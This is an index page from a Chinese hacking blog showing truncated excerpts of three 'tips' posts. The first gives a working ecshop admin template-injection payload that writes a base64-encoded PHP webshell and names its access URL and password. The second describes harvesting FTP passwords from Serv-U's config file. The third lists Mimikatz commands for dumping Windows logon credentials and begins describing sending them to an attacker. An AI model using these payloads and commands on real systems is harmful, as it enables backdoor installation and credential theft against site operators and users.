热门 ecshop后台getshell方法集合

时间:2016-11-29   作者:webbaozi   分类: 小技巧   热度:1925°    
时间:2016-11-29   分类: 小技巧    热度:1925  
姿势来源互联网,只是做个整理~~ 1. 模板管理--语言项编辑 如:user.php 搜索:状态 插入${${fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgQGFzc2VydCgkX1BPU1RbJ3onXSk7Pz4))}} 访问http://localhost/languages/zh_cn/user.php 一句话:http://localhost/languages/zh_cn/fuck.php密码z ...

阅读全文>>

热门 利用Serv-U获取ftp账号密码

时间:2016-11-13   作者:webbaozi   分类: 小技巧   热度:1593°    
时间:2016-11-13   分类: 小技巧    热度:1593  
1.可以读取文件 2.安装了Serv-U 在其Serv-U安装目录会有文件ServUDaemon.ini 拿其中一个举例: 格式为: [USER=baozi|1] 表示用户为baozi password=mk7DC2A4B1A9A9E1F52A7F967FBCAA0A37表示ftp用户baozi的密码为“mk7DC2A4B1A9A9E1F52A7F967FBCAA0A37”。   HomeDir=d:\wwwroot\zt828表示默认主目录为“d:\wwwroot\baozi...

阅读全文>>

热门 Mimikatz 使用Tips

时间:2016-11-11   作者:webbaozi   分类: 小技巧   热度:1424°    
时间:2016-11-11   分类: 小技巧    热度:1424  
 ps:以管理员身份运行 1.记录 Mimikatz输出:  C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件:  C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt 3.将输出传输到远程机器:  Attacker执行:&nbs...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1